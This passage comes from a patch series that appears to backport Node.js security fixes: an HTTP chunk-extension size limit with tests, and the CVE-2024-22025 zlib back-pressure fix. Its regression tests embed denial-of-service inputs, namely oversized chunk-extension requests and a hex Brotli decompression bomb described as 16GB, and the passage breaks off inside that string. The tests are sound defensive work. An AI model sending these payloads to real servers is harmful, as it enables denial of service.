s_n_llhttp__internal__n_chunk_parameters; + } + case 2: { +- p++; +- goto s_n_llhttp__internal__n_chunk_size_almost_done; ++ goto s_n_llhttp__internal__n_span_end_llhttp__on_chunk_parameters; + } + default: { + goto s_n_llhttp__internal__n_error_6; +@@ -9309,6 +9361,34 @@ static llparse_state_t llhttp__internal__run( + /* UNREACHABLE */; + abort(); + } ++ case s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters: ++ s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters: { ++ if (p == endp) { ++ return s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters; ++ } ++ state->_span_pos0 = (void*) p; ++ state->_span_cb0 = llhttp__on_chunk_parameters; ++ goto s_n_llhttp__internal__n_chunk_parameters; ++ /* UNREACHABLE */; ++ abort(); ++ } ++ case s_n_llhttp__internal__n_chunk_parameters_ows: ++ s_n_llhttp__internal__n_chunk_parameters_ows: { ++ if (p == endp) { ++ return s_n_llhttp__internal__n_chunk_parameters_ows; ++ } ++ switch (*p) { ++ case ' ': { ++ p++; ++ goto s_n_llhttp__internal__n_chunk_parameters_ows; ++ } ++ default: { ++ goto s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters; ++ } ++ } ++ /* UNREACHABLE */; ++ abort(); ++ } + case s_n_llhttp__internal__n_chunk_size_otherwise: + s_n_llhttp__internal__n_chunk_size_otherwise: { + if (p == endp) { +@@ -9319,13 +9399,9 @@ static llparse_state_t llhttp__internal__run( + p++; + goto s_n_llhttp__internal__n_chunk_size_almost_done; + } +- case ' ': { +- p++; +- goto s_n_llhttp__internal__n_chunk_parameters; +- } + case ';': { + p++; +- goto s_n_llhttp__internal__n_chunk_parameters; ++ goto s_n_llhttp__internal__n_chunk_parameters_ows; + } + default: { + goto s_n_llhttp__internal__n_error_7; +@@ -13951,6 +14027,24 @@ static llparse_state_t llhttp__internal__run( + /* UNREACHABLE */; + abort(); + } ++ s_n_llhttp__internal__n_span_end_llhttp__on_chunk_parameters: { ++ const unsigned char* start; ++ int err; ++ ++ start = state->_span_pos0; ++ state->_span_pos0 = NULL; ++ err = llhttp__on_chunk_parameters(state, start, p); ++ if (err != 0) { ++ state->error = err; ++ state->error_pos = (const char*) (p + 1); ++ state->_current = (void*) (intptr_t) s_n_llhttp__internal__n_chunk_size_almost_done; ++ return s_error; ++ } ++ p++; ++ goto s_n_llhttp__internal__n_chunk_size_almost_done; ++ /* UNREACHABLE */; ++ abort(); ++ } + s_n_llhttp__internal__n_error_6: { + state->error = 0x2; + state->reason = "Invalid character in chunk parameters"; +diff --git a/doc/api/errors.md b/doc/api/errors.md +index dcf8744..a76bfe5 100644 +--- a/doc/api/errors.md ++++ b/doc/api/errors.md +@@ -3043,6 +3043,18 @@ malconfigured clients, if more than 8 KiB of HTTP header data is received then + HTTP parsing will abort without a request or response object being created, and + an `Error` with this code will be emitted. + ++<a id="HPE_CHUNK_EXTENSIONS_OVERFLOW"></a> ++ ++### `HPE_CHUNK_EXTENSIONS_OVERFLOW` ++ ++<!-- YAML ++added: REPLACEME ++--> ++ ++Too much data was received for a chunk extensions. In order to protect against ++malicious or malconfigured clients, if more than 16 KiB of data is received ++then an `Error` with this code will be emitted. ++ + <a id="HPE_UNEXPECTED_CONTENT_LENGTH"></a> + + ### `HPE_UNEXPECTED_CONTENT_LENGTH` +diff --git a/lib/_http_server.js b/lib/_http_server.js +index 4e23266..263bb52 100644 +--- a/lib/_http_server.js ++++ b/lib/_http_server.js +@@ -706,6 +706,11 @@ const requestHeaderFieldsTooLargeResponse = Buffer.from( + `HTTP/1.1 431 ${STATUS_CODES[431]}\r\n` + + 'Connection: close\r\n\r\n', 'ascii' + ); ++const requestChunkExtensionsTooLargeResponse = Buffer.from( ++ `HTTP/1.1 413 ${STATUS_CODES[413]}\r\n` + ++ 'Connection: close\r\n\r\n', 'ascii', ++); ++ + function socketOnError(e) { + // Ignore further errors + this.removeListener('error', socketOnError); +@@ -719,6 +724,9 @@ function socketOnError(e) { + case 'HPE_HEADER_OVERFLOW': + response = requestHeaderFieldsTooLargeResponse; + break; ++ case 'HPE_CHUNK_EXTENSIONS_OVERFLOW': ++ response = requestChunkExtensionsTooLargeResponse; ++ break; + case 'ERR_HTTP_REQUEST_TIMEOUT': + response = requestTimeoutResponse; + break; +diff --git a/src/node_http_parser.cc b/src/node_http_parser.cc +index 74f3248..b92e848 100644 +--- a/src/node_http_parser.cc ++++ b/src/node_http_parser.cc +@@ -79,6 +79,8 @@ const uint32_t kOnExecute = 5; + const uint32_t kOnTimeout = 6; + // Any more fields than this will be flushed into JS + const size_t kMaxHeaderFieldsCount = 32; ++// Maximum size of chunk extensions ++const size_t kMaxChunkExtensionsSize = 16384; + + const uint32_t kLenientNone = 0; + const uint32_t kLenientHeaders = 1 << 0; +@@ -206,6 +208,7 @@ class Parser : public AsyncWrap, public StreamListener { + + int on_message_begin() { + num_fields_ = num_values_ = 0; ++ chunk_extensions_nread_ = 0; + url_.Reset(); + status_message_.Reset(); + header_parsing_start_time_ = uv_hrtime(); +@@ -443,9 +446,22 @@ class Parser : public AsyncWrap, public StreamListener { + return 0; + } + +- // Reset nread for the next chunk ++ int on_chunk_extension(const char* at, size_t length) { ++ chunk_extensions_nread_ += length; ++ ++ if (chunk_extensions_nread_ > kMaxChunkExtensionsSize) { ++ llhttp_set_error_reason(&parser_, ++ "HPE_CHUNK_EXTENSIONS_OVERFLOW:Chunk extensions overflow"); ++ return HPE_USER; ++ } ++ ++ return 0; ++ } ++ ++ // Reset nread for the next chunk and also reset the extensions counter + int on_chunk_header() { + header_nread_ = 0; ++ chunk_extensions_nread_ = 0; + return 0; + } + +@@ -887,6 +903,7 @@ class Parser : public AsyncWrap, public StreamListener { + const char* current_buffer_data_; + bool pending_pause_ = false; + uint64_t header_nread_ = 0; ++ uint64_t chunk_extensions_nread_ = 0; + uint64_t max_http_header_size_; + uint64_t headers_timeout_; + uint64_t header_parsing_start_time_ = 0; +@@ -921,6 +938,7 @@ const llhttp_settings_t Parser::settings = { + Proxy<DataCall, &Parser::on_header_field>::Raw, + Proxy<DataCall, &Parser::on_header_value>::Raw, + Proxy<Call, &Parser::on_headers_complete>::Raw, ++ Proxy<DataCall, &Parser::on_chunk_extension>::Raw, + Proxy<DataCall, &Parser::on_body>::Raw, + Proxy<Call, &Parser::on_message_complete>::Raw, + Proxy<Call, &Parser::on_chunk_header>::Raw, +diff --git a/test/parallel/test-http-chunk-extensions-limit.js b/test/parallel/test-http-chunk-extensions-limit.js +new file mode 100644 +index 0000000..6868b3d +--- /dev/null ++++ b/test/parallel/test-http-chunk-extensions-limit.js +@@ -0,0 +1,131 @@ ++'use strict'; ++ ++const common = require('../common'); ++const http = require('http'); ++const net = require('net'); ++const assert = require('assert'); ++ ++// Verify that chunk extensions are limited in size when sent all together. ++{ ++ const server = http.createServer((req, res) => { ++ req.on('end', () => { ++ res.writeHead(200, { 'Content-Type': 'text/plain' }); ++ res.end('bye'); ++ }); ++ ++ req.resume(); ++ }); ++ ++ server.listen(0, () => { ++ const sock = net.connect(server.address().port); ++ let data = ''; ++ ++ sock.on('data', (chunk) => data += chunk.toString('utf-8')); ++ ++ sock.on('end', common.mustCall(function() { ++ assert.strictEqual(data, 'HTTP/1.1 413 Payload Too Large\r\nConnection: close\r\n\r\n'); ++ server.close(); ++ })); ++ ++ sock.end('' + ++ 'GET / HTTP/1.1\r\n' + ++ 'Host: localhost:8080\r\n' + ++ 'Transfer-Encoding: chunked\r\n\r\n' + ++ '2;' + 'A'.repeat(20000) + '=bar\r\nAA\r\n' + ++ '0\r\n\r\n' ++ ); ++ }); ++} ++ ++// Verify that chunk extensions are limited in size when sent in intervals. ++{ ++ const server = http.createServer((req, res) => { ++ req.on('end', () => { ++ res.writeHead(200, { 'Content-Type': 'text/plain' }); ++ res.end('bye'); ++ }); ++ ++ req.resume(); ++ }); ++ ++ server.listen(0, () => { ++ const sock = net.connect(server.address().port); ++ let remaining = 20000; ++ let data = ''; ++ ++ const interval = setInterval( ++ () => { ++ if (remaining > 0) { ++ sock.write('A'.repeat(1000)); ++ } else { ++ sock.write('=bar\r\nAA\r\n0\r\n\r\n'); ++ clearInterval(interval); ++ } ++ ++ remaining -= 1000; ++ }, ++ common.platformTimeout(20), ++ ).unref(); ++ ++ sock.on('data', (chunk) => data += chunk.toString('utf-8')); ++ ++ sock.on('end', common.mustCall(function() { ++ assert.strictEqual(data, 'HTTP/1.1 413 Payload Too Large\r\nConnection: close\r\n\r\n'); ++ server.close(); ++ })); ++ ++ sock.write('' + ++ 'GET / HTTP/1.1\r\n' + ++ 'Host: localhost:8080\r\n' + ++ 'Transfer-Encoding: chunked\r\n\r\n' + ++ '2;' ++ ); ++ }); ++} ++ ++// Verify the chunk extensions is correctly reset after a chunk ++{ ++ const server = http.createServer((req, res) => { ++ req.on('end', () => { ++ res.writeHead(200, { 'content-type': 'text/plain', 'connection': 'close', 'date': 'now' }); ++ res.end('bye'); ++ }); ++ ++ req.resume(); ++ }); ++ ++ server.listen(0, () => { ++ const sock = net.connect(server.address().port); ++ let data = ''; ++ ++ sock.on('data', (chunk) => data += chunk.toString('utf-8')); ++ ++ sock.on('end', common.mustCall(function() { ++ assert.strictEqual( ++ data, ++ 'HTTP/1.1 200 OK\r\n' + ++ 'content-type: text/plain\r\n' + ++ 'connection: close\r\n' + ++ 'date: now\r\n' + ++ 'Transfer-Encoding: chunked\r\n' + ++ '\r\n' + ++ '3\r\n' + ++ 'bye\r\n' + ++ '0\r\n' + ++ '\r\n', ++ ); ++ ++ server.close(); ++ })); ++ ++ sock.end('' + ++ 'GET / HTTP/1.1\r\n' + ++ 'Host: localhost:8080\r\n' + ++ 'Transfer-Encoding: chunked\r\n\r\n' + ++ '2;' + 'A'.repeat(10000) + '=bar\r\nAA\r\n' + ++ '2;' + 'A'.repeat(10000) + '=bar\r\nAA\r\n' + ++ '2;' + 'A'.repeat(10000) + '=bar\r\nAA\r\n' + ++ '0\r\n\r\n' ++ ); ++ }); ++} +diff --git a/tools/update-llhttp.sh b/tools/update-llhttp.sh +index 12e2f46..a95eef1 100755 +--- a/tools/update-llhttp.sh ++++ b/tools/update-llhttp.sh +@@ -59,5 +59,5 @@ echo "" + echo "Please git add llhttp, commit the new version:" + echo "" + echo "$ git add -A deps/llhttp" +-echo "$ git commit -m \"deps: update nghttp2 to $LLHTTP_VERSION\"" ++echo "$ git commit -m \"deps: update llhttp to $LLHTTP_VERSION\"" + echo "" +-- +2.40.0 diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22025.patch b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22025.patch new file mode 100644 index 0000000000..ac3a54aba6 --- /dev/null +++ b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22025.patch @@ -0,0 +1,148 @@ +From 9052ef43dc2d1b0db340591a9bc9e45a25c01d90 Mon Sep 17 00:00:00 2001 +From: Matteo Collina <hello@matteocollina.com> +Date: Tue, 6 Feb 2024 16:47:20 +0100 +Subject: [PATCH 4/5] zlib: pause stream if outgoing buffer is full + +Signed-off-by: Matteo Collina <hello@matteocollina.com> +PR-URL: https://github.com/nodejs-private/node-private/pull/540 +Reviewed-By: Robert Nagy <ronagy@icloud.com> +Ref: https://hackerone.com/reports/2284065 + +CVE-ID: CVE-2024-22025 + +Upstream-Status: Backport [https://github.com/nodejs/node/commit/9052ef43dc2d1b0d] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/zlib.js | 32 +++++++++++++++++++------- + test/parallel/test-zlib-brotli-16GB.js | 22 ++++++++++++++++++ + test/parallel/test-zlib-params.js | 24 +++++++++++-------- + 3 files changed, 61 insertions(+), 17 deletions(-) + create mode 100644 test/parallel/test-zlib-brotli-16GB.js + +diff --git a/lib/zlib.js b/lib/zlib.js +index 9bde199..8e033e5 100644 +--- a/lib/zlib.js ++++ b/lib/zlib.js +@@ -560,10 +560,11 @@ function processCallback() { + self.bytesWritten += inDelta; + + const have = handle.availOutBefore - availOutAfter; ++ let streamBufferIsFull = false; + if (have > 0) { + const out = self._outBuffer.slice(self._outOffset, self._outOffset + have); + self._outOffset += have; +- self.push(out); ++ streamBufferIsFull = !self.push(out); + } else { + assert(have === 0, 'have should not go down'); + } +@@ -588,13 +589,28 @@ function processCallback() { + handle.inOff += inDelta; + handle.availInBefore = availInAfter; + +- this.write(handle.flushFlag, +- this.buffer, // in +- handle.inOff, // in_off +- handle.availInBefore, // in_len +- self._outBuffer, // out +- self._outOffset, // out_off +- self._chunkSize); // out_len ++ if (!streamBufferIsFull) { ++ this.write(handle.flushFlag, ++ this.buffer, // in ++ handle.inOff, // in_off ++ handle.availInBefore, // in_len ++ self._outBuffer, // out ++ self._outOffset, // out_off ++ self._chunkSize); // out_len ++ } else { ++ const oldRead = self._read; ++ self._read = (n) => { ++ self._read = oldRead; ++ this.write(handle.flushFlag, ++ this.buffer, // in ++ handle.inOff, // in_off ++ handle.availInBefore, // in_len ++ self._outBuffer, // out ++ self._outOffset, // out_off ++ self._chunkSize); // out_len ++ self._read(n); ++ }; ++ } + return; + } + +diff --git a/test/parallel/test-zlib-brotli-16GB.js b/test/parallel/test-zlib-brotli-16GB.js +new file mode 100644 +index 0000000..1ca10f7 +--- /dev/null ++++ b/test/parallel/test-zlib-brotli-16GB.js +@@ -0,0 +1,22 @@ ++use strict'; ++ ++const common = require('../common'); ++const { createBrotliDecompress } = require('node:zlib'); ++const strictEqual = require('node:assert').strictEqual; ++ ++// This tiny HEX string is a 16GB file. ++// This test verifies that the stream actually stops. ++/* eslint-disable max-len */ ++const content = 'cfffff7ff82700e2b14020f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c32200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7